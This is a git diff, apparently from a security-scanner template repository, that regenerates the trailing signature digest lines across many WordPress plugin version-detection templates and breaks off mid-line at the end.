a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 29c24cc9c3..6a9a1ec6ea 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f79c5b150bdffce7217aa2b5dc183a003d5e70443bee7bce0683fe34decbb6830220191983f7d6c5b0fff7e2fe1052eafc104e4495c057d810ef74fe5e4768da0ece:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f438fdea30d588d7f5e9165aa9f1be0d41ee93dc8beacb5c26c787e29e004d60220754c2b63bd2a0c8a485ffe7682d7a28495800dafc52c9bb966b49b86dcb2386d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 4c16ca0547..278287d390 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e6224083c3117d90c3f269d7bd6890f4a337e9c7d223ee03814c0c2e59bacad9022100d08fd4ccc342faf318d0c77efd52a1c43e047a2a227b540f737edfb77e91791a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ea9dabf525cfa2823966da59299c772d86daf18efde03a79fc97c373a6230e102210090bd65573e78b08978c98a3ccd0a8531d2a429ca5fc480f20ee31158edcf8669:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 5131f9ef5b..d2ff243f7f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100932e517b31f9b4ec4ffe2666ee9651abfbbd9af66c93356f388ff5004df1b0a502206b48eca6866b19d6fcb70d69cac061d5d9332aa90aafea003032d52603ecb65f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220728b083a3089903352bf61c62c59f409e48eff9a63b0394b6056c2e6da10951b02210093472ff58e9507ed5fbbf9ba75e3a6c7955e28c6a6940ae9677499ea5eb818a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 68d95878a0..52bb72056f 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e160ca3bc7f401bbe93d1c6cc6a14ba4c44dc914dfcc71c635320f3dd3c80ef8022100f08de2b1d453d9c897992e5fb03338b338ab2016e79f5754ee8db3f56bdd8c1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009ab179eac3f31595693e6c230d72f3b923cfbaf8a2b8ade6eccf5c1e68a0b57a02207b3647a2822bd6fca54d070a37c243f2973d608a39b0ff9d0926933d1e062f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 064a3678bb..22fc86ba69 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022076e3d2280a8d8a32cd912ccf253e0df561f34bbafb654f1cb69894b752b33cdc02207974b9a5a313181edda2261a501c9faf25e9ceecea3e0886a8de71aa7924da39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5dca026056a35a8bb0869fbd4aae8e66107b33e465500124bcbf71c2cb88750022044a30932caf7062254b2b8fd5eec92e616e980430d2c1a87db3ae60c0e12628f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index e27c0eeeec..b47051c1c0 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502206b69420f5056df60145554e3b22012663a8a4b003b2aee8cb27094cf52140b78022100e71c04839625b3aba5f169d9318d81a5933fa316e11637eceecf17aaa2949a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200139ad22aa80d468721cdbf36ff149607d72dc407cde9c6d0f240124004959de0220420f85b58ad42062ffcb04b06abd89531e26d430653ff27261900fbbda398877:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index f91949c954..069fb129d4 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ab1703f9905ec17ba598917691b7e05462acd0861f4255c631bec4b92e864e370220686e6b3581592764e85cd51ee8813845d986cc73cb9df81388c317bb9dece413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f79d6f4b6d33505c85c3ea4f9f417c94e55f3522f974347e5ae2c24f691aa1d02200e69884f8c5d99d98ca88d4607bdf23928d676ad2cf0908c2638eede28d41a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index cac7656703..942b0191ff 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204dd3f114fae3abd7f520bf472a889a078d2c71b5ee462aab2ee87e8b393f4b69022000b5392c7ea36652ae16120fe947f27f64440cefef2f75ea402c79ae2cefde1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201cfb69da56c24c310883f5cabc3670b8a6bb3d603f9324988b7da2f0a2ba3c6202202b1f210c7ec3dce397684ba22ee1388436c38161fa15a792d12ef013da39793b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 59cd007e4c..992b25f022 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200127412924b7583466606ab50bbb833fc3b5279665fb7c8078c5664bdc49c9ef022100a3df3588f5ca61f83fb65f949a5a87664f3cc76977e10ea7809a910df4de7beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb4e82f1fa69eb6743dc9c3898937834596ff1e92b9dae673643d6d5edbf0fb102201e5614156da00054e43f3db457cb0b634e55308f5522596f4260121f4fb7f6a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index ad43fa59c5..0d774a2bbe 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100836c06ad562d9bf76ce3f9eec4e4c9e3c79ea86cae357bef775c90db3cef44fc022032ae10392fb73131ea10b5e34b806365b28432b85e7dcd42cdf36697e46752b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220464e7717b8db6431f62cb67647ae3727b9e7964f109b9c7d8f5bfda75c730c9c02202b38582dab0c12bead120c34f99da90707dc072914d49b8c4f286b955c1a79ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index a06f1c991b..707e59277c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c98d775e3cb2e48ef1ef272fb2bd1b3a5c29c4fb0eb0993b64b3913e74cb1254022100f855da1f764a1f05073aaa6157b1b4c24ac4d89b37d4a4f4b4341cacaba384cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e644c65563ff2d6aa743a1455586bee79f68030f1591f81da24ae57c2f518efc022100dc00152741df9c0f50980b854fcc1e81623c2943724efffeaa9c1be2557f7d91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 9757f4d916..c123ac1b72 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022013dae9746571061dbfffb2fdd316f1eb64c2da23b4f503415ab6c6c510da9d9f02210092bf1ef94f9e2e865898fa0d8e18117c236327130cdf0d172019dd4c1afc3d94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220710b72e5e80e80193eaf4f9388913dc06a2e7aabe67dd50e654cc8976cf3ab04022100b46fbef7a0832707a7b753fb129e00459e431440ac27e918f6310d2f85ee8240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 51c9ea42d3..07429975e4 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a1d4cf2ebd7896326a5c366678b5043ca1c8dcca8f07315ccfee295c78e580c8022100a1d62e6f76486375aeb1e80f5fd25c8fdd0dbdad274168b65a0fb4714afb4c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6e6f35df4aa214a61b51b57e7c45fb469e16fda13e8ece7c13ce7632c2ca64b0220450500043a2c0b480203d231ff616cc8d042e9ed07da4a2e1f4c1b2d69fd2b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 0d1ea0e9a9..397a347267 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fb950f77bfa6039317b195989e11f47126445c3ce592d33db78ba0818530fd2302207d1ad83d643efe1d330da75ed6146fb2db13346eedc902214b26a3d7ed0b4a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205a928244bf4cd4584e7e29caaa235cee272646344eb52a6c4d9f8e15286adea80220348ab115bafc17d8248c6b042e48fead5cacec05880ef763e651bc830f35d345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index d74cc6f8bd..3304746769 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204a834a3c1b98611e02f342e25897438906dfa04ea6f98645ddca54b3fcc5dd8302207510000de5f1cbcc46afe2e7bfdf6014ce7336c60945cbe70532dbdbd4c19e4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210087ec0a181b2ef5e596cbdbe7814c52ae753498dba4f35f21b39f46a67cbb9142022100a76a426b506f678efe7f669bde5eec0d5962144cce424879018ac2d6b5c562f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 5770a17046..cf1c74bba5 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210088a7ff318140a7355f3fd4b6aa0b7bafd531ef664fbd8bde1b6785846cc1bc460221009eb47008dcee34727e1cd8433d94999d86952f1ede80055bc3141f395e22476e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084e54762bcb4cd5d493b86eb1912a89dbaabd69f6e498195d859deb52399b953022100d2e45c6ce4c1ea4654f5e78b282e0b250c5d5ed9e67ccf59b918267cae67f469:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 772c4c2edc..3ef3f300d6 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e94daed852ac4323ed97cfbd6593384c0e4c7be32851a9bdc98da265e5a5c3ac022100a87ec0c9a217333531c562e1007fc97ad5fec04d687656c44a14ed9976c21a58:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220269a3014a55f2fbd945d537eda4758c3f118cb413a6c464e8cb130c2af473b4c022100efe4dca3939b111cbb96518d2663cd40e4a333363d32122567deb9e21cce247a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 85ce175ca7..003e22032c 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e0ce158c90fbf4bf986d2c2d1bd7e815ed51dc5a2b69c2584f14acb21779252d022100dfe3871db0315449a2a649d503ba557379d2e03543ca5c9531bbc153e14840e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e6e3a05cb670a73389da17803a01aefe80dc102ae9521d6e98be6d7c463f24bf0220133696727b403251ce8f6b27633e0a041a5f45d7ff40d1e2362648b6f2c8da35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 9a3f697ed7..86a09be506 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202802392779c3fcfaa7d73feb311bd557b6172148260618d92a1e2c04fee1ac9f022100e874769f9a104774a300b0f8871d6719430b123b2b67c2cf8ee7d2900f4ed435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022017a219c33cfedc3353aa9470eb093a0c53c66e0a214f40db400d8586f57886710221009de6c8daf79165773cbeb4a680b6ae87a74d73e26bf60209dcb4f4f40baeebe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 0bcf6a605e..8aa383ef50 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d1392eb545d6d5a05c2c9af3dcfd96f2fe7469abbab5d634da9c708c7ea588010220740cb0347c1c61129274e2e758a0610d6647eeed76df26186ae9da6a6adf5fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a5faa32426de477aece26aa78d69d991466a2da84f403f4079623f928bd276b022100e0a9508eabb5cae1cdf79f215b38e0a1459afe2d0094f93bc81eb8d479c7215a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 7ec544090f..237a6a1fae 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bcae90c3c4f5ee9ee4a805eb7a08b2c0191d2b97efe7435e2ef33e5d6e92fae7022100ef15dade4a4a7814b62764bb9b2402c510376607efde5fcedf88dd9878d3dea7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb009beff00ea9d82f2698854ecbfbe3f2f4bc4afb3a9c266df62f1de8b4182202210098b1ff51f58dd20411d9d05377630ce55901790f8fd902d2b73a537f859031b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 5442ed272b..567a78c4f1 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210093bcf9649adbcc43b30b134ee5cc01fb969ff772578a9e3d92b244764acf77e6022100d8df3b1ef5912abdafd58d98ad6ee0246902a17de9fa6effde07afdb6c5b8f1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082839dd810a120083866bb143a6f6fe6df4ac413138c84caf63dc9d742264593022100fd6bbdf9764d2103c3db64d2dfa849d33a9f234ef9d6f011d6f629fdef406eb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 89f52eb3bb..788449fef2 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022018a11ef416c0e600e9f4e660bc69b0d35ef9629e0befe3662c0eb599e4164a5d022100ab5c154483fecfefa6b2a58418bb1d5c52ed43c77a622a85dc5d696635ba9ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100afdfe27b8e59692079c2ea4e8b67d2d92398e8a5edc64d42e687a512d19832a40221009930963a2f8c0be271ee81af0e4e5c4d5aa15528db6b7da133278a5e094b4a34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index be02f02a8c..476dbca73f 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210092d11db0abacd7cb1dd9857ddd2e851b829282c928d22c08ce71980de44ed59702201898078cf27ece789dfbfa195da2c2cc16963caac12e6d8df2249825a8db7977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100baac09a567e88dc29ae83c43e0e65e785deaf9d1b747413a275fe51983b3efc5022006f50b7dbd910010c9af5c3d34cd31233b77663b6d6270aa10ca6058a2a9c964:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index e36e41fb6c..1c014932e8 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022079dc32f951fb534c0060578a1e33b1646241b99d943232b0ce65a1bd639a935c02202deccfc7c4f502a86819527dd32f916eb64ba7b1ee894065bf499ed0814aedc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aae2fa1ec3f0bad8f14cbae0354ab742ddd7469aea9d3e91db5a658c7274153a022100a3579b78f7264d808cb67d0c74e274c5354c7e363bc400aa20dd7f6d3023f2e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index bb2576b82b..0a417ad302 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100dd5a7b6f3551715349eb3026bcc85180463b2c924d42c681d70242d7391e879602206faaab9843a9dd256f42ba00c5b8048a44731eef22f3495f4930e884c8a5ac09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ee49323b37a4c2586c812630f7b69653fb75bb97a3c96c8d4d310012b0f22217022100f811a19e5703b65964eb7f1978b9f7cdf9aa82bbc028eb15e19c451b857b43cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 4dbc7f1ee1..496bc51e50 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009108de4cc3068c6ee9d2e21a5a55decb46bf957d0aa019c8d792be8208725cab022014f884ec0bc032e0eef8d795d892828dc45b97f037405545aa78119ec5a71778:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b15b94d4283f0245315d748299c6e6bc90cfe422e7cd9ad78306724847bcdf002206416b0519773092c87a10b7370cb6df962c1aca08ab596b8870acdc232f89824:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 5c3d98b16e..5fcd1310f2 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220048e734f7b1a4b750970555e40016205426753c26c69e4ba155f841f06c5545c022100f02c0d11283d1909f82b5abce8951fe8c4ca08e8b0f7a73c6e7c9ec2d128e08c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009490c5a3340c49f6543c40929a375ed639225da0261c85ff79e0ae0a0731c0410220098a962c9afde799bcd05cce922faaefb649b1804c4e04c3eca01a35b54fe103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index bdcb8abaeb..bb65f5b8f2 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210099690e591e2f0209d6011a4d21f1b04301c248df1c9e8ee05d9d9f52abb7f28b02200d57e27599abded0615fde01fe1151e2750c0c5477a7eca43a60b923de322c35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021b0053f88892e62fb9400e633e2a952f31ce4fd6af3166025643a69cf83bed7022100d847b2c1e0aced39cea844460b81821a970df9f503de30ed667189896865c3c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index e3a4ef9d80..db9350e192 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100dd4d396fdd3770d6ea0369982259b6aa483dbe8aa7f400a277d04acf0906759d0221008b7db25ab7569e095202db3f0617dac01ef8102e2d3bb6669c81086d64675d30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220111474d5e77c54ada6f350a8e6f445a9fc5508c08f7475bb6dd93aecb350f4d7022100d2bbdf3f40b38c6c9953f8e4be9b8f751d49bfcf26c63f2e446acbce448e0c3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 574bd8da4b..aa746384bc 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100920b4a78219b084ff74502785e232759a8a6742df35ba1d13ef19d833189724c02202ea0cd565c62fa85d9df18efcd38c931fadc885822845ae1262d79c3482a012b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220697790729821d6294b40a1bdfc7893120ee240c39d4467f5e98edd4999f7c71a0220486f4b01ea4db27662950de38cbb226393f61bcb0f7e0c3c346574b7a40b25ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index dc527ef986..aa078ec1fe 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d0dde6bfc1e30142224e4ed8980363a2ed208a35ab3e899c6e4ff5da5a3487c8022100aac88aba01977da68e156dfd4ba985cc9eb2b38e33e778d4f52faee8acdc6aff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203a246b879ff3dc0813a8475ebdc1bbf17fc32d6365a3757962c8dc43b2389fcf02202b2599510553ac5ece3d3d080d93f8f904d7c27771a3aa7915e841c3add35b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 1fb6aa30b0..187c08ab2e 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a1b369d64eb792de910472e3dd9cda0e6ccef8e651e5b223b2c7af4cc7e445ec02206fe7b2be22afda20a0e5234cab9d2d871b984e0284cd35d37cb248b18adadf34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9c1969eaf597ae59d7b1bcbeb857e105da9f449292aee65baaf32f0b09957fe02205c3b5a9afe6120796361af5b2641f6760ff52069d45f09c8795f1d47bb45cdbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index b9d0613459..0e44ee6275 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 